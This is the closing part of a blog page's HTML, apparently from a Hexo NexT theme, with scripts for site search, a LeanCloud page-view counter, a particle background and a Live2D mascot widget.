                if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
                if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
                $resultContent.innerHTML = str;
            });
            proceedsearch();
        }
    });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };

    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  

  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("bBeCKSjfRYuFFh1xspY4nlf5-gzGzoHsz", "tshfDJAljHmYj5V2dUsNIKQs");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

<!-- 背景动画 -->
<script type="text/javascript" src="/js/src/particle.js"></script>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>

</div>

<!-- <a href="https://github.com/tengzhangchao"><img style="position: absolute; top: 0; left: 0; border: 0;" src="https://camo.githubusercontent.com/567c3a48d796e2fc06ea80409cc9dd82bf714434/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f6c6566745f6461726b626c75655f3132313632312e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_left_darkblue_121621.png"></a> -->
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/assets/z16.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body>
</html>
